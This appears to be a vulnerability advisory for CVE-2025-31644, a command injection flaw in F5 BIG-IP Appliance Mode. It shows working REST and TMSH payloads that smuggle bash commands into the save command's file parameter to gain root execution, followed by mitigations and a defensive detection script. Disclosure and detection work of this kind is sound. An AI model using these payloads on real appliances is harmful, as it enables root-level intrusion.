CVE-2025-31644: Command Injection Vulnerability in F5 BIG-IP (Appliance Mode)
Date: May 13, 2025
Tags: CVE-2025-31644, F5 BIG-IP, Command Injection, Appliance Mode, Exploit
Overview
A critical vulnerability identified as CVE-2025-31644 affects F5 BIG-IP systems running in Appliance Mode. It allows authenticated administrators to perform remote code execution (RCE) by exploiting command injection via the save command's file parameter.
This issue arises from unsafe handling of user-supplied values, which are passed directly into Perl scripts or shell commands, leading to exploitation using shell metacharacters.
Affected Environment
- F5 BIG-IP Version: 16.1.4.1
- Vulnerable Only in: Appliance Mode
- Required Role for Exploitation: Administrator (via REST API or TMSH over SSH)
Root Cause
The file parameter of the save command is not sanitized properly before being passed to system-level scripts. This allows attackers to:
- Inject commands using backticks (`) or other shell metacharacters
- Execute arbitrary bash commands as root
- Bypass Appliance Mode restrictions that would normally block shell access
Exploitation Vectors
1. Via REST API (/mgmt)
Request:
POST /mgmt/tm/sys/config HTTP/1.1
Host: <target>
Authorization: Basic <admin-creds>
Content-Type: application/json
Content-Length: 148
{
"command": "save",
"options": [
{
"file": "/var/tmp/`bash'${IFS}-c${IFS}'id'|'tee'${IFS}-a${IFS}'mal_was_here`.scf",
"passphrase": "aaaa"
}
]
}
Response:
Even though the server returns a 400 Bad Request with an encryption failure message, the injected command (id) executes successfully and its output is logged.
2. Via TMSH (over SSH)
Command:
save sys config file /var/tmp/`bash'${IFS}-c${IFS}'id'${IFS}'>&2`.scf no-passphrase
Effect:
The id command runs as root. Output redirection (>&2) ensures the result is printed to STDERR, confirming success.
Key Observations
- Only administrator users can exploit this due to needing access to the file parameter.
- All command injection relies on embedding shell code into the file parameter.
- Shell metacharacters like `, |, and ${IFS} are used to evade basic filtering.
- This is only a vulnerability in Appliance Mode, where such commands should be blocked.
Mitigation
- Upgrade to Patched Version (if released by F5).
- Restrict Administrator Access to only trusted users.
- Monitor Logs for suspicious usage of the save command with file paths in /var/tmp/.
- Isolate REST API Access from untrusted networks.
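One way to implement the log-monitoring step, as an added example that is not part of the original write-up or F5's own code: it checks the file value of a save request, in both the REST body and the TMSH command form shown above, against a conservative character allowlist. The allowlist, the function names and the sample inputs are assumptions made for this example; where the request bodies and command lines come from (an audit log, a logging proxy) depends on the deployment.

```python
import json
import re

# Assumption: legitimate config file names use only these characters.
# Anything else (backtick, |, $, quotes, spaces) is flagged for review.
SAFE_PATH = re.compile(r"[A-Za-z0-9._/-]+")
TMSH_SAVE = re.compile(r"\s*save\s+sys\s+config\s+file\s+(\S+)")

def file_is_suspicious(path):
    """True if a save-command file value leaves the conservative allowlist."""
    return SAFE_PATH.fullmatch(path) is None

def check_rest_body(body):
    """Suspicious file values in a POST /mgmt/tm/sys/config JSON body."""
    try:
        doc = json.loads(body)
    except ValueError:
        return []
    if not isinstance(doc, dict) or doc.get("command") != "save":
        return []
    options = doc.get("options")
    if not isinstance(options, list):
        return []
    return [o["file"] for o in options
            if isinstance(o, dict) and isinstance(o.get("file"), str)
            and file_is_suspicious(o["file"])]

def check_tmsh_line(line):
    """Suspicious file argument of 'save sys config file <path> ...', else None."""
    m = TMSH_SAVE.match(line)
    # Only the first whitespace-delimited token after "file" is examined.
    if m and file_is_suspicious(m.group(1)):
        return m.group(1)
    return None

# Constructed sample inputs (not captured from a real device).
REST_OK = '{"command": "save", "options": [{"file": "/var/tmp/backup.scf", "passphrase": "x"}]}'
REST_BAD = '{"command": "save", "options": [{"file": "/var/tmp/`id`.scf", "passphrase": "x"}]}'
TMSH_OK = "save sys config file /var/tmp/backup.scf no-passphrase"
TMSH_BAD = "save sys config file /var/tmp/`id${IFS}-u`.scf no-passphrase"

if __name__ == "__main__":
    for body in (REST_OK, REST_BAD):
        print("REST:", check_rest_body(body))
    for line in (TMSH_OK, TMSH_BAD):
        print("TMSH:", check_tmsh_line(line))
```

An allowlist is used rather than a list of known-bad characters because the payloads above already show substitutions such as ${IFS} standing in for a space.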
Conclusion
CVE-2025-31644 is a high-severity vulnerability that allows authenticated admin users to gain root shell access in restricted Appliance Mode environments. This vulnerability demonstrates the risks of insecure parameter handling even in tightly controlled admin interfaces. Organizations using F5 BIG-IP should audit usage, apply patches promptly, and monitor for suspicious config-saving operations.
Stay secure. Patch often. Audit always.